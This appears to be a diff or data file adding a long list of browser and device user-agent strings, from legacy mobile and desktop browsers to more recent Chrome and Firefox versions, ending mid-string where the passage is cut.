+Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) +Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] +Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) +Mozilla/4.8 [en] (Windows NT 5.1; U) +Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) +Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ +Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a +Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 +Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) +Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 +Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 +Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4736.0 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 +Mozilla/5.0 (PLAYSTATION 3; 1.10) +Mozilla/5.0 (PLAYSTATION 3; 2.00) +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 +Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 +Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 +Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 +Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) 